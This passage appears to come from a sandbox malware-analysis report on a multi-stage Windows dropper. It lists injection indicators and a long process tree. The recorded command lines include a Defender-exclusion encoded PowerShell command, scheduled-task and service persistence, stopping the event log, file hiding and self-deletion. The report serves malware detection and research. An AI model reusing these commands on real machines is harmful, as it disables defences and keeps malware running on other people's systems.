Token: SeTakeOwnershipPrivilege	1148	powershell.exe
Token: SeLoadDriverPrivilege	1148	powershell.exe
Token: SeSystemProfilePrivilege	1148	powershell.exe
Token: SeSystemtimePrivilege	1148	powershell.exe
Token: SeProfSingleProcessPrivilege	1148	powershell.exe
Token: SeIncBasePriorityPrivilege	1148	powershell.exe
Token: SeCreatePagefilePrivilege	1148	powershell.exe
Token: SeBackupPrivilege	1148	powershell.exe
Token: SeRestorePrivilege	1148	powershell.exe
Token: SeShutdownPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeSystemEnvironmentPrivilege	1148	powershell.exe
Token: SeRemoteShutdownPrivilege	1148	powershell.exe
Token: SeUndockPrivilege	1148	powershell.exe
Token: SeManageVolumePrivilege	1148	powershell.exe
Token: 33	1148	powershell.exe
Token: 34	1148	powershell.exe
Token: 35	1148	powershell.exe
Token: 36	1148	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	powershell.exe
Token: SeSecurityPrivilege	1148	powershell.exe
Token: SeTakeOwnershipPrivilege	1148	powershell.exe
Token: SeLoadDriverPrivilege	1148	powershell.exe
Token: SeSystemProfilePrivilege	1148	powershell.exe
Token: SeSystemtimePrivilege	1148	powershell.exe
Token: SeProfSingleProcessPrivilege	1148	powershell.exe
Token: SeIncBasePriorityPrivilege	1148	powershell.exe
Token: SeCreatePagefilePrivilege	1148	powershell.exe
Token: SeBackupPrivilege	1148	powershell.exe
Token: SeRestorePrivilege	1148	powershell.exe
Token: SeShutdownPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeSystemEnvironmentPrivilege	1148	powershell.exe
Token: SeRemoteShutdownPrivilege	1148	powershell.exe
Token: SeUndockPrivilege	1148	powershell.exe
Token: SeManageVolumePrivilege	1148	powershell.exe
Token: 33	1148	powershell.exe
Token: 34	1148	powershell.exe
Token: 35	1148	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

BroomSetup.exe

pid process

6020 BroomSetup.exe

pid	process
6020	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exevoice5.13sert.exeSynapseExploit.exetuc4.exeghjkl.exeis-AEKA1.tmpBLduscfibj.exeghjkl.exe

description	pid	process	target process
PID 784 wrote to memory of 4188	784	4363463463464363463463463.exe	nxmr.exe
PID 784 wrote to memory of 4188	784	4363463463464363463463463.exe	nxmr.exe
PID 784 wrote to memory of 3452	784	4363463463464363463463463.exe	voice5.13sert.exe
PID 784 wrote to memory of 3452	784	4363463463464363463463463.exe	voice5.13sert.exe
PID 3452 wrote to memory of 4948	3452	voice5.13sert.exe	voice5.13sert.exe
PID 3452 wrote to memory of 4948	3452	voice5.13sert.exe	voice5.13sert.exe
PID 784 wrote to memory of 3984	784	4363463463464363463463463.exe	SynapseExploit.exe
PID 784 wrote to memory of 3984	784	4363463463464363463463463.exe	SynapseExploit.exe
PID 784 wrote to memory of 3984	784	4363463463464363463463463.exe	SynapseExploit.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3984 wrote to memory of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 784 wrote to memory of 6132	784	4363463463464363463463463.exe	2-3-1_2023-12-14_13-35.exe
PID 784 wrote to memory of 6132	784	4363463463464363463463463.exe	2-3-1_2023-12-14_13-35.exe
PID 784 wrote to memory of 6132	784	4363463463464363463463463.exe	2-3-1_2023-12-14_13-35.exe
PID 784 wrote to memory of 4204	784	4363463463464363463463463.exe	tuc4.exe
PID 784 wrote to memory of 4204	784	4363463463464363463463463.exe	tuc4.exe
PID 784 wrote to memory of 4204	784	4363463463464363463463463.exe	tuc4.exe
PID 4204 wrote to memory of 112	4204	tuc4.exe	is-AEKA1.tmp
PID 4204 wrote to memory of 112	4204	tuc4.exe	is-AEKA1.tmp
PID 4204 wrote to memory of 112	4204	tuc4.exe	is-AEKA1.tmp
PID 784 wrote to memory of 3292	784	4363463463464363463463463.exe	ghjkl.exe
PID 784 wrote to memory of 3292	784	4363463463464363463463463.exe	ghjkl.exe
PID 784 wrote to memory of 3292	784	4363463463464363463463463.exe	ghjkl.exe
PID 3292 wrote to memory of 3708	3292	ghjkl.exe	BLduscfibj.exe
PID 3292 wrote to memory of 3708	3292	ghjkl.exe	BLduscfibj.exe
PID 3292 wrote to memory of 3708	3292	ghjkl.exe	BLduscfibj.exe
PID 784 wrote to memory of 2212	784	4363463463464363463463463.exe	cs_maltest.exe
PID 784 wrote to memory of 2212	784	4363463463464363463463463.exe	cs_maltest.exe
PID 784 wrote to memory of 2212	784	4363463463464363463463463.exe	cs_maltest.exe
PID 112 wrote to memory of 5708	112	is-AEKA1.tmp	schtasks.exe
PID 112 wrote to memory of 5708	112	is-AEKA1.tmp	schtasks.exe
PID 112 wrote to memory of 5708	112	is-AEKA1.tmp	schtasks.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 112 wrote to memory of 5660	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 112 wrote to memory of 5660	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 112 wrote to memory of 5660	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3292 wrote to memory of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 3708 wrote to memory of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 112 wrote to memory of 5244	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 112 wrote to memory of 5244	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 112 wrote to memory of 5244	112	is-AEKA1.tmp	UdioConverterRipper.exe
PID 4880 wrote to memory of 5680	4880	ghjkl.exe	cmd.exe
PID 4880 wrote to memory of 5680	4880	ghjkl.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

7280 attrib.exe
5992 attrib.exe

pid	process
7280	attrib.exe
5992	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - DcRat
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:784
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4188
- - C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4948
- - C:\Users\Admin\AppData\Local\Temp\Files\SynapseExploit.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\SynapseExploit.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5588
    - - C:\Users\Admin\AppData\Local\Temp\conhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5680
        
        C:\Windows\system32\mode.com
        
        mode 65,10
        7⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p2092234702066417206614013400 -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\main\IdXsAYepwNyor9pXCym14F9nUPSKx8f.exe
        
        "IdXsAYepwNyor9pXCym14F9nUPSKx8f.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5052
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        8⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAG4ATAAwAGEAaABWAHQATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAYgAzAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwAzAHkAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAEMAMgBoAGQAVAAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        9⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAG4ATAAwAGEAaABWAHQATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAYgAzAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwAzAHkAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAEMAMgBoAGQAVAAjAD4A"
        10⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3162" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        9⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3162" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:5904
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        9⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1968
        
        C:\Windows\system32\attrib.exe
        
        attrib +H "IdXsAYepwNyor9pXCym14F9nUPSKx8f.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5992
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1772
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        6⤵
        
        PID:840
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\update.exe"
        7⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Roaming\update.exe
        
        C:\Users\Admin\AppData\Roaming\update.exe
        8⤵
        
        PID:3448
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "CGMNDIHH"
        9⤵
        Launches sc.exe
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
        9⤵
        Launches sc.exe
        
        PID:5256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\update.exe"
        9⤵
        
        PID:4980
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        10⤵
        
        PID:720
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "CGMNDIHH"
        9⤵
        Launches sc.exe
        
        PID:2780
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        9⤵
        Launches sc.exe
        
        PID:4156
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 1788
        7⤵
        Program crash
        
        PID:3976
- - C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"
    3⤵
    - Executes dropped EXE
    PID:6132
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 7332
      4⤵
      Program crash
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4204
  - - C:\Users\Admin\AppData\Local\Temp\is-EOAGL.tmp\is-AEKA1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-EOAGL.tmp\is-AEKA1.tmp" /SL4 $E010C "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe" 9740347 52224
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:112
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "UCR1163"
        5⤵
        
        PID:5708
    - - C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe
        
        "C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -s
        5⤵
        Executes dropped EXE
        
        PID:5244
    - - C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe
        
        "C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -i
        5⤵
        Executes dropped EXE
        
        PID:5660
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
      "C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:3708
    - - C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
        
        C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
        5⤵
        Executes dropped EXE
        
        PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
      C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 504
        5⤵
        Program crash
        
        PID:3252
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 512
        5⤵
        Program crash
        
        PID:2828
- - C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
    3⤵
    - Executes dropped EXE
    PID:2212
- - C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4336
- - C:\Users\Admin\AppData\Local\Temp\Files\ninet.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ninet.exe"
    3⤵
    - DcRat
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2372
- - C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
    3⤵
    - Executes dropped EXE
    PID:1016
  - - C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe
      "C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      PID:5556
  - - C:\Users\Admin\AppData\Local\Temp\visual-c++.exe
      "C:\Users\Admin\AppData\Local\Temp\visual-c++.exe"
      4⤵
      Executes dropped EXE
      PID:5340
    - - C:\Users\Admin\AppData\Local\Temp\Files\PAETools.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\PAETools.exe
        5⤵
        
        PID:5092
- - C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4268
- - C:\Users\Admin\AppData\Local\Temp\Files\Posh_v2_dropper_x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Posh_v2_dropper_x64.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
    3⤵
    - Executes dropped EXE
    PID:5772
  - - C:\Users\Admin\AppData\Local\Temp\is-SJN86.tmp\is-M0EI2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-SJN86.tmp\is-M0EI2.tmp" /SL4 $50226 "C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe" 9508382 52224
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:6012
- - C:\Users\Admin\AppData\Local\Temp\Files\5d3e8177e87cc.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\5d3e8177e87cc.exe"
    3⤵
    PID:3136
- - C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
    3⤵
    - Executes dropped EXE
    PID:3068
- - C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2108
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:4444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 252
      4⤵
      Program crash
      PID:3448
- - C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
    3⤵
    - Executes dropped EXE
    PID:2200
  - - C:\Windows\svchost.exe
      "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
      4⤵
      Executes dropped EXE
      PID:4912
    - - C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
        5⤵
        Executes dropped EXE
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        
        PID:5940
      - C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:244
        
        C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        7⤵
        Executes dropped EXE
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        
        PID:5316
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        9⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        10⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:5724
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        11⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        12⤵
        
        PID:576
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        13⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        14⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:5400
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        15⤵
        Executes dropped EXE
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        16⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5688
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        17⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        18⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:5180
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        19⤵
        Executes dropped EXE
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        20⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:5380
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        21⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        22⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:4024
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        23⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        24⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:3568
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        25⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        26⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:3772
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        27⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        28⤵
        
        PID:1648
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        29⤵
        Drops file in Windows directory
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        30⤵
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        
        PID:2328
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        31⤵
        Drops file in Windows directory
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        32⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:5284
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        33⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        34⤵
        
        PID:4268
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        35⤵
        Drops file in Windows directory
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        36⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:1784
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        37⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
